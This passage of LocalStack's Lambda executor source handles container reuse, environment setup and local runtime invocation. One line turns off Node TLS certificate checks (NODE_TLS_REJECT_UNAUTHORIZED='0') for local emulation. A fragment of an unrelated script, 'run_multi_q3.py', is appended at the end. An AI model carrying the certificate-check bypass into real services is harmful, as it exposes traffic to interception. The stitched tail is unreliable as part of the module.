self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
"""Abstract executor class for executing Lambda functions in Docker containers"""
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
raise NotImplementedError
def run_lambda_executor(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
env_vars = inv_context.environment
runtime = lambda_function.runtime or ""
event = inv_context.event
stdin_str = None
event_body = event if event is not None else env_vars.get("AWS_LAMBDA_EVENT_BODY")
event_body = json.dumps(event_body) if isinstance(event_body, dict) else event_body
event_body = event_body or ""
is_large_event = len(event_body) > MAX_ENV_ARGS_LENGTH
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if (
not is_large_event
and lambda_function
and is_provided
and env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1"
):
# Note: certain "provided" runtimes (e.g., Rust programs) can block if we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
"AWS_LAMBDA_EVENT_BODY": to_str(
event_body
), # Note: seems to be needed for provided runtimes!
"DOCKER_LAMBDA_USE_STDIN": "1",
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop("AWS_LAMBDA_COGNITO_IDENTITY", None)
if is_large_event:
# in case of very large event payloads, we need to pass them via stdin
LOG.debug(
"Received large Lambda event payload (length %s) - passing via stdin"
% len(event_body)
)
env_vars["DOCKER_LAMBDA_USE_STDIN"] = "1"
if env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1":
stdin_str = event_body
if not is_provided:
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
elif "AWS_LAMBDA_EVENT_BODY" not in env_vars:
env_vars["AWS_LAMBDA_EVENT_BODY"] = to_str(event_body)
# apply plugin patches
result = self.apply_plugin_patches(inv_context)
if isinstance(result, InvocationResult):
return result
if config.LAMBDA_DOCKER_FLAGS:
inv_context.docker_flags = (
f"{config.LAMBDA_DOCKER_FLAGS} {inv_context.docker_flags or ''}".strip()
)
event_stdin_bytes = stdin_str and to_bytes(stdin_str)
error = None
try:
result, log_output = self.execute_in_container(
lambda_function,
inv_context,
stdin=event_stdin_bytes,
)
except ContainerException as e:
result = e.stdout or ""
log_output = e.stderr or ""
error = e
except InvocationException as e:
result = e.result or ""
log_output = e.log_output or ""
error = e
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = lambda_function and lambda_function.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
store_lambda_logs(lambda_function, log_output)
if error:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
) from error
# create result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
"""Return the event as a stdin string."""
# amend the environment variables for execution
environment["AWS_LAMBDA_EVENT_BODY"] = event_body
return event_body.encode()
def _execute(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
runtime = lambda_function.runtime
handler = lambda_function.handler
environment = inv_context.environment = self._prepare_environment(lambda_function)
event = inv_context.event
context = inv_context.context
# configure USE_SSL in environment
if config.USE_SSL:
environment["USE_SSL"] = "1"
# prepare event body
if not event:
LOG.info(
'Empty event body specified for invocation of Lambda "%s"' % lambda_function.arn()
)
event = {}
event_body = json.dumps(json_safe(event))
event_bytes_for_stdin = self.prepare_event(environment, event_body)
inv_context.event = event_bytes_for_stdin
Util.inject_endpoints_into_env(environment)
environment["EDGE_PORT"] = str(config.EDGE_PORT)
environment[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
if os.environ.get("HTTP_PROXY"):
environment["HTTP_PROXY"] = os.environ["HTTP_PROXY"]
if lambda_function.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(lambda_function.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_COGNITO_IDENTITY"] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment["AWS_LAMBDA_CLIENT_CONTEXT"] = json.dumps(
to_str(base64.b64decode(to_bytes(context.client_context)))
)
# pass JVM options to the Lambda environment, if configured
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
if environment.get("JAVA_TOOL_OPTIONS"):
LOG.info(
"Skip setting LAMBDA_JAVA_OPTS as JAVA_TOOL_OPTIONS already defined in Lambda env vars"
)
else:
LOG.debug(
"Passing JVM options to container environment: JAVA_TOOL_OPTIONS=%s"
% config.LAMBDA_JAVA_OPTS
)
environment["JAVA_TOOL_OPTIONS"] = config.LAMBDA_JAVA_OPTS
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment["NODE_TLS_REJECT_UNAUTHORIZED"] = "0"
# run Lambda executor and fetch invocation result
LOG.info("Running lambda: %s" % lambda_function.arn())
result = self.run_lambda_executor(lambda_function=lambda_function, inv_context=inv_context)
return result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
if config.LAMBDA_REMOTE_DOCKER:
LOG.info("TODO: copy file into container for LAMBDA_REMOTE_DOCKER=1 - %s", local_file)
return local_file
mountable_file = Util.get_host_path_for_path_in_docker(local_file)
_, extension = os.path.splitext(local_file)
target_file_name = f"{md5(local_file)}{extension}"
target_path = f"/tmp/{target_file_name}"
        existing_flags = inv_context.docker_flags or ""
        inv_context.docker_flags = f"{existing_flags} -v {mountable_file}:{target_path}".strip()
return target_path
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
"""Executor class for executing Lambda functions in re-usable Docker containers"""
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
func_arn = lambda_function.arn()
lambda_cwd = lambda_function.cwd
runtime = lambda_function.runtime
env_vars = inv_context.environment
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars["_LAMBDA_SERVER_PORT"] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug(
'Priming docker container with runtime "%s" and arn "%s".',
runtime,
func_arn,
)
container_info = self.prime_docker_container(
lambda_function, dict(env_vars), lambda_cwd, inv_context.docker_flags
)
if not inv_context.lambda_command and inv_context.handler:
command = container_info.entry_point.split()
command.append(inv_context.handler)
inv_context.lambda_command = command
# determine files to be copied into the container
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
DOCKER_CLIENT.copy_into_container(
container_info.name, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER
)
lambda_docker_ip = DOCKER_CLIENT.get_container_ip(container_info.name)
if not self._should_use_stay_open_mode(lambda_docker_ip, check_port=True):
LOG.debug("Using 'docker exec' to run invocation in docker-reuse Lambda container")
return DOCKER_CLIENT.exec_in_container(
container_name_or_id=container_info.name,
command=inv_context.lambda_command,
interactive=True,
env_vars=env_vars,
stdin=stdin,
)
inv_result = self.invoke_lambda(lambda_function, inv_context, lambda_docker_ip)
return (inv_result.result, inv_result.log_output)
def invoke_lambda(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
lambda_docker_ip=None,
) -> InvocationResult:
full_url = self._get_lambda_stay_open_url(lambda_docker_ip)
client = aws_stack.connect_to_service("lambda", endpoint_url=full_url)
event = inv_context.event or "{}"
LOG.debug(f"Calling {full_url} to run invocation in docker-reuse Lambda container")
response = client.invoke(
FunctionName=lambda_function.name(),
InvocationType=inv_context.invocation_type,
Payload=to_bytes(event),
LogType="Tail",
)
log_output = base64.b64decode(response.get("LogResult") or b"").decode("utf-8")
result = response["Payload"].read().decode("utf-8")
if "FunctionError" in response:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
)
return InvocationResult(result, log_output)
def _should_use_stay_open_mode(
self, lambda_docker_ip: Optional[str], check_port: bool = False
) -> bool:
"""Return whether to use stay-open execution mode - if we're running in Docker, the given IP
is defined, and if the target API endpoint is available (optionally, if check_port is True)."""
should_use = lambda_docker_ip and in_docker()
if not should_use or not check_port:
return False
full_url = self._get_lambda_stay_open_url(lambda_docker_ip)
return is_port_open(full_url)
def _get_lambda_stay_open_url(self, lambda_docker_ip: str) -> str:
return f"http://{lambda_docker_ip}:{STAY_OPEN_API_PORT}"
def _execute(self, func_arn: str, *args, **kwargs) -> InvocationResult:
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn: str = None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(
self,
lambda_function: LambdaFunction,
env_vars: Dict,
lambda_cwd: str,
docker_flags: str = None,
):
"""
Prepares a persistent docker container for a specific function.
:param lambda_function: The Details of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = lambda_function.arn()
container_name = self.get_container_name(func_arn)
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming Docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(lambda_function)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug("Creating container: %s" % container_name)
self.create_container(lambda_function, env_vars, lambda_cwd, docker_flags)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug(
'Copying files to container "%s" from "%s".' % (container_name, lambda_cwd)
)
DOCKER_CLIENT.copy_into_container(
container_name, "%s/." % lambda_cwd, DOCKER_TASK_FOLDER
)
LOG.debug("Starting docker-reuse Lambda container: %s", container_name)
DOCKER_CLIENT.start_container(container_name)
def wait_up():
cont_status = DOCKER_CLIENT.get_container_status(container_name)
assert cont_status == DockerContainerStatus.UP
if not in_docker():
return
# if we're executing in Docker using stay-open mode, additionally check if the target is available
lambda_docker_ip = DOCKER_CLIENT.get_container_ip(container_name)
if self._should_use_stay_open_mode(lambda_docker_ip):
full_url = self._get_lambda_stay_open_url(lambda_docker_ip)
wait_for_port_open(full_url, sleep_time=0.5, retries=8)
# give the container some time to start up
retry(wait_up, retries=15, sleep=0.8)
container_network = self.get_docker_container_network(func_arn)
entry_point = DOCKER_CLIENT.get_image_entrypoint(docker_image)
LOG.debug(
'Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network)
)
return ContainerInfo(container_name, entry_point)
def create_container(
self,
lambda_function: LambdaFunction,
env_vars: Dict,
lambda_cwd: str,
docker_flags: str = None,
):
docker_image = Util.docker_image_for_lambda(lambda_function)
container_name = self.get_container_name(lambda_function.arn())
# make sure we set LOCALSTACK_HOSTNAME
Util.inject_endpoints_into_env(env_vars)
# make sure AWS_LAMBDA_EVENT_BODY is not set (otherwise causes issues with "docker exec ..." above)
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
network = config.LAMBDA_DOCKER_NETWORK
additional_flags = docker_flags
dns = config.LAMBDA_DOCKER_DNS
mount_volumes = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if ":" in lambda_cwd and "\\" in lambda_cwd:
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volumes = [(lambda_cwd_on_host, DOCKER_TASK_FOLDER)] if mount_volumes else None
if os.environ.get("HOSTNAME"):
env_vars["HOSTNAME"] = os.environ.get("HOSTNAME")
env_vars["EDGE_PORT"] = config.EDGE_PORT
command = None
entrypoint = "/bin/bash"
interactive = True
if in_docker():
env_vars["DOCKER_LAMBDA_STAY_OPEN"] = "1"
entrypoint = None
command = [lambda_function.handler]
interactive = False
LOG.debug(
"Creating docker-reuse Lambda container %s from image %s", container_name, docker_image
)
return DOCKER_CLIENT.create_container(
image_name=docker_image,
remove=True,
interactive=interactive,
detach=True,
name=container_name,
entrypoint=entrypoint,
command=command,
network=network,
env_vars=env_vars,
dns=dns,
mount_volumes=mount_volumes,
additional_flags=additional_flags,
)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug("Stopping container: %s" % container_name)
DOCKER_CLIENT.stop_container(container_name)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug("Removing container: %s" % container_name)
rm_docker_container(container_name, safe=True)
# clean up function invoke times, as some init logic depends on this
self.function_invoke_times.pop(func_arn, None)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
        :return: A list of LocalStack Docker container names, one per Lambda function.
"""
with self.docker_container_lock:
LOG.debug("Getting all lambda containers names.")
list_result = DOCKER_CLIENT.list_containers(
filter=f"name={self.get_container_prefix()}*"
)
container_names = list(map(lambda container: container["name"], list_result))
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug("Removing %d containers." % len(container_names))
for container_name in container_names:
DOCKER_CLIENT.remove_container(container_name)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
        :return: 1 if the container is running,
                -1 if the container exists but is not running,
                 0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
container_status = DOCKER_CLIENT.get_container_status(container_name)
return container_status.value
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ""
# Get the container name.
container_name = self.get_container_name(func_arn)
container_network = DOCKER_CLIENT.get_network(container_name)
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug("Checking if there are idle containers ...")
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
        Starts a repeating timer that re-invokes this method every 60 seconds,
        checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_prefix(self) -> str:
"""
Returns the prefix of all docker-reuse lambda containers for this LocalStack instance
:return: Lambda container name prefix
"""
return f"{bootstrap.get_main_container_name()}_lambda_"
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return self.get_container_prefix() + re.sub(r"[^a-zA-Z0-9_.-]", "_", func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
# Tell Lambci to use STDIN for the event
environment["DOCKER_LAMBDA_USE_STDIN"] = "1"
return event_body.encode()
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
lambda_cwd = lambda_function.cwd
env_vars = inv_context.environment
entrypoint = None
if inv_context.lambda_command:
entrypoint = ""
elif inv_context.handler:
inv_context.lambda_command = inv_context.handler
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK or None
if network == "host":
port = get_free_tcp_port()
env_vars["DOCKER_LAMBDA_API_PORT"] = port
env_vars["DOCKER_LAMBDA_RUNTIME_PORT"] = port
additional_flags = inv_context.docker_flags or ""
dns = config.LAMBDA_DOCKER_DNS
docker_java_ports = PortMappings()
if Util.debug_java_port:
docker_java_ports.add(Util.debug_java_port)
docker_image = Util.docker_image_for_lambda(lambda_function)
if config.LAMBDA_REMOTE_DOCKER:
container_id = DOCKER_CLIENT.create_container(
image_name=docker_image,
interactive=True,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
ports=docker_java_ports,
command=inv_context.lambda_command,
)
DOCKER_CLIENT.copy_into_container(container_id, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER)
return DOCKER_CLIENT.start_container(
container_id, interactive=not background, attach=not background, stdin=stdin
)
else:
mount_volumes = None
if lambda_cwd:
mount_volumes = [
(Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
]
return DOCKER_CLIENT.run_container(
image_name=docker_image,
interactive=True,
detach=background,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
command=inv_context.lambda_command,
mount_volumes=mount_volumes,
stdin=stdin,
)
class LambdaExecutorLocal(LambdaExecutor):
def _execute_in_custom_runtime(
self, cmd: Union[str, List[str]], lambda_function: LambdaFunction = None
) -> InvocationResult:
"""
Generic run function for executing lambdas in custom runtimes.
:param cmd: the command to execute
:param lambda_function: function details
:return: the InvocationResult
"""
env_vars = lambda_function and lambda_function.envvars
kwargs = {"stdin": True, "inherit_env": True, "asynchronous": True, "env_vars": env_vars}
process = run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate()
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
# TODO: not sure if this code is needed/used
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = lambda_function and lambda_function.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
# store_lambda_logs(lambda_function, log_output)
if return_code != 0:
raise InvocationException(
"Lambda process returned error status code: %s. Result: %s. Output:\n%s"
% (return_code, result, log_output),
log_output,
result,
)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def _execute(
self, lambda_function: LambdaFunction, inv_context: InvocationContext
) -> InvocationResult:
# apply plugin patches to prepare invocation context
result = self.apply_plugin_patches(inv_context)
if isinstance(result, InvocationResult):
return result
lambda_cwd = lambda_function.cwd
environment = self._prepare_environment(lambda_function)
if lambda_function.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(lambda_function.timeout)
context = inv_context.context
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_FUNCTION_MEMORY_SIZE"] = str(context.memory_limit_in_mb)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function_callable = lambda_function.function(inv_context.function_version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, "")
if environment:
os.environ.update(environment)
# set default env variables required for most Lambda handlers
self.set_default_env_variables()
# run the actual handler function
result = lambda_function_callable(inv_context.event, context)
except Exception as e:
result = str(e)
sys.stderr.write("%s %s" % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (
request_id,
lambda_function.arn(),
)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ("\n" if log_output else "") + stream
if isinstance(result, InvocationResult) and result.log_output:
log_output += "\n" + result.log_output
log_output += "\nEND RequestId: %s" % request_id
log_output += "\nREPORT RequestId: %s Duration: %s ms" % (
request_id,
int((end_time - start_time) * 1000),
)
# store logs to CloudWatch
store_lambda_logs(lambda_function, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info(
'Error executing Lambda "%s": %s %s',
lambda_function.arn(),
error,
"".join(traceback.format_tb(error.__traceback__)),
)
raise InvocationException(result, log_output)
# construct final invocation result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
# This is a no-op for local executors - simply return the given local file path
return local_file
def execute_java_lambda(
self, event, context, main_file, lambda_function: LambdaFunction = None
) -> InvocationResult:
lambda_function.envvars = lambda_function.envvars or {}
java_opts = config.LAMBDA_JAVA_OPTS or ""
handler = lambda_function.handler
lambda_function.envvars[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
event_file = EVENT_FILE_PATTERN.replace("*", short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
classpath = "%s:%s:%s" % (
main_file,
Util.get_java_classpath(main_file),
LAMBDA_EXECUTOR_JAR,
)
cmd = "java %s -cp %s %s %s" % (
java_opts,
classpath,
LAMBDA_EXECUTOR_CLASS,
event_file,
)
# apply plugin patches
inv_context = InvocationContext(
lambda_function, event, environment=lambda_function.envvars, lambda_command=cmd
)
result = self.apply_plugin_patches(inv_context)
if isinstance(result, InvocationResult):
return result
cmd = inv_context.lambda_command
LOG.info(cmd)
# execute Lambda and get invocation result
invocation_result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return invocation_result
def execute_javascript_lambda(
self, event, context, main_file, lambda_function: LambdaFunction = None
):
handler = lambda_function.handler
function = handler.split(".")[-1]
event_json_string = "%s" % (json.dumps(json_safe(event)) if event else "{}")
context_json_string = "%s" % (json.dumps(context.__dict__) if context else "{}")
cmd = [
"node",
"-e",
'require("%s").%s(%s,%s).then(r => process.stdout.write(JSON.stringify(r)))'
% (
main_file,
function,
event_json_string,
context_json_string,
),
]
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return result
@staticmethod
def set_default_env_variables():
# set default env variables required for most Lambda handlers
default_env_vars = {"AWS_DEFAULT_REGION": aws_stack.get_region()}
env_vars_before = {var: os.environ.get(var) for var in default_env_vars}
os.environ.update({k: v for k, v in default_env_vars.items() if not env_vars_before.get(k)})
return env_vars_before
@staticmethod
def reset_default_env_variables(env_vars_before):
for env_name, env_value in env_vars_before.items():
env_value_before = env_vars_before.get(env_name)
os.environ[env_name] = env_value_before or ""
if env_value_before is None:
os.environ.pop(env_name, None)
def execute_go_lambda(self, event, context, main_file, lambda_function: LambdaFunction = None):
if lambda_function:
lambda_function.envvars["AWS_LAMBDA_FUNCTION_HANDLER"] = main_file
lambda_function.envvars["AWS_LAMBDA_EVENT_BODY"] = json.dumps(json_safe(event))
else:
LOG.warning("Unable to get function details for local execution of Golang Lambda")
cmd = GO_LAMBDA_RUNTIME
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ""
# Replace _debug_port_ with a random free port
if "_debug_port_" in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace("_debug_port_", ("%s" % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match(".*address=(.+:)?(\\d+).*", opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r"^%s/(.*)$" % config.dirs.tmp, r"%s/\1" % config.dirs.functions, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(":", "").replace("\\", "/")
if len(temp) >= 1 and temp[:1] != "/":
temp = "/" + temp
temp = "%s%s" % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_lambda(cls, lambda_function: LambdaFunction):
runtime = lambda_function.runtime or ""
if lambda_function.code.get("ImageUri"):
LOG.warning(
"ImageUri is set: Using Lambda container images is only supported in LocalStack Pro"
)
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
if runtime == "nodejs14.x" and docker_image == DEFAULT_LAMBDA_CONTAINER_REGISTRY:
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = "localstack/lambda-js"
if runtime == "python3.9" and docker_image == DEFAULT_LAMBDA_CONTAINER_REGISTRY:
# TODO temporary fix until we support AWS images via https://github.com/localstack/localstack/pull/4734
docker_image = "mlupin/docker-lambda"
return "%s:%s" % (docker_image, docker_tag)
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ["."]
base_dir = os.path.dirname(archive)
for pattern in ["%s/*.jar", "%s/lib/*.jar", "%s/java/lib/*.jar", "%s/*.zip"]:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append("*.jar")
entries.append("java/lib/*.jar")
result = ":".join(entries)
return result
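    # Illustrative example (not part of the original code): for archive
    # "/tmp/fn/handler.jar" with only "/tmp/fn/lib/dep.jar" present alongside it,
    # the returned classpath would be ".:lib/dep.jar:handler.jar:*.jar:java/lib/*.jar".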
@staticmethod
def mountable_tmp_file():
f = os.path.join(config.dirs.tmp, short_uid())
TMP_FILES.append(f)
return f
@staticmethod
def inject_endpoints_into_env(env_vars: Dict[str, str]):
env_vars = env_vars or {}
main_endpoint = get_main_endpoint_from_container()
if not env_vars.get("LOCALSTACK_HOSTNAME"):
env_vars["LOCALSTACK_HOSTNAME"] = main_endpoint
return env_vars
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
"local": EXECUTOR_LOCAL,
"docker": EXECUTOR_CONTAINERS_SEPARATE,
"docker-reuse": EXECUTOR_CONTAINERS_REUSE,
}
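# --- Illustrative sketch (not part of the original module) -------------------
# The comment above notes that AVAILABLE_EXECUTORS keys map to the LAMBDA_EXECUTOR
# config variable. A minimal, hypothetical lookup helper could therefore look like
# this; the function name is an assumption made for illustration only.
def _select_executor_sketch(executor_name):
    """Return the executor registered under `executor_name`, or the default."""
    return AVAILABLE_EXECUTORS.get(executor_name, DEFAULT_EXECUTOR)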
|
run_multi_q3.py
|
import os
from multiprocessing import Process, Lock
import re
base_folder = 'code/data'
data_folder = 'data'
exp_names = ['rec_hist_60_delta_3','rec_hist_60_delta_5','rec_hist_60_delta_10']
